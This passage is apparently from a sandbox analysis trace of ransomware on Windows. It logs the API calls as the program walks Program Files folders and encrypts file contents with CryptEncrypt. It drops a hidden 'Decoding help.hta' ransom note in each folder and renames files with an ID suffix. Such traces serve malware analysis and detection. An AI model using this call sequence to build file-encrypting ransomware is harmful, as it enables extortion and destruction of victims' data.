pdwDataLen=0xa78fce4*=0x2c) returned 1 [0039.873] MapViewOfFile (hFileMappingObject=0x234, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0xa010000 [0039.878] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa78fbe4*, pdwDataLen=0xa78fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa78fbe4*, pdwDataLen=0xa78fcf8*=0x100) returned 1 [0039.879] CryptEncrypt (in: hKey=0x5a5870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa010000, pdwDataLen=0xa78fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0xa010000*, pdwDataLen=0xa78fce4*=0x12800) returned 1 [0039.880] UnmapViewOfFile (lpBaseAddress=0xa010000) returned 1 [0039.882] CloseHandle (hObject=0x234) returned 1 [0039.882] CryptDestroyKey (hKey=0x5a5870) returned 1 [0039.882] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.882] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.882] WriteFile (in: hFile=0x23c, lpBuffer=0xa78fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa78fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa78fbe4*, lpNumberOfBytesWritten=0xa78fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.883] WriteFile (in: hFile=0x23c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa78fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa78fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.883] CloseHandle (hObject=0x23c) returned 1 [0039.884] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.884] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0039.884] lstrcmpW (lpString1=".", lpString2="TableTextService") returned -1 [0039.884] lstrcmpW (lpString1="..", lpString2="TableTextService") returned -1 [0039.885] lstrcmpiW (lpString1="windows", lpString2="TableTextService") returned 1 [0039.885] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" [0039.885] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned 41 [0039.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\", lpString2="TableTextService" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService" [0039.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\*.*" [0039.885] GlobalMemoryStatus (in: lpBuffer=0xa78fd10 | out: lpBuffer=0xa78fd10) [0039.885] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9358180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0039.908] CloseHandle (hObject=0x23c) returned 1 [0039.908] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 0 [0039.908] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 106 os_tid = 0xbdc [0039.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*", lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0039.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.853] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.853] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.854] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.854] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.854] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.854] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US" [0039.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0039.854] GlobalMemoryStatus (in: lpBuffer=0xa8cfd10 | out: lpBuffer=0xa8cfd10) [0039.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9310048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0039.866] CloseHandle (hObject=0x23c) returned 1 [0039.866] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7849cb5e, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x7849cb5e, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xdacc7aae, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0039.867] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.867] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.867] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.867] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0xffffffff [0039.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0039.867] WriteFile (in: hFile=0x23c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa8cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa8cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.868] CloseHandle (hObject=0x23c) returned 1 [0039.868] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.868] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingDevices.exe") returned -1 [0039.868] lstrlenW (lpString="ImagingDevices.exe") returned 18 [0039.868] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.868] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.868] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="ImagingDevices.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" [0039.868] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" [0039.868] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.907] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67366c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67366c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb675c828, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0039.907] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.907] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.907] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.907] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingEngine.dll") returned -1 [0039.907] lstrlenW (lpString="ImagingEngine.dll") returned 17 [0039.907] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.907] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.907] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="ImagingEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" [0039.907] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" [0039.907] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.937] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6710567, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6710567, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67366c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0039.937] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.937] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.937] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoAcq.dll") returned -1 [0039.937] lstrlenW (lpString="PhotoAcq.dll") returned 12 [0039.937] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.937] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="PhotoAcq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" [0039.937] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" [0039.937] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.937] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b02653, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x78b02653, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xad33fb10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0039.937] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.938] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoBase.dll") returned -1 [0039.938] lstrlenW (lpString="PhotoBase.dll") returned 13 [0039.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.938] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="PhotoBase.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" [0039.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.938] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb66ea407, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb66ea407, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6710567, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x163800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0039.938] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.938] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" [0039.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.938] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoViewer.dll") returned -1 [0039.938] lstrlenW (lpString="PhotoViewer.dll") returned 15 [0039.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.938] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned 51 [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\", lpString2="PhotoViewer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" [0039.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" [0039.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.939] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xa8cfd30 | out: lpFindFileData=0xa8cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4115360, ftCreationTime.dwHighDateTime=0x1d4fac8, ftLastAccessTime.dwLowDateTime=0x987df1f0, ftLastAccessTime.dwHighDateTime=0x1d4b88c, ftLastWriteTime.dwLowDateTime=0x987df1f0, ftLastWriteTime.dwHighDateTime=0x1d4b88c, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="suffernorwegianfifteen.exe", cAlternateFileName="SUFFER~1.EXE")) returned 1 [0039.939] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0039.939] lstrlenW (lpString="\\\\?\\C:\\Program Files 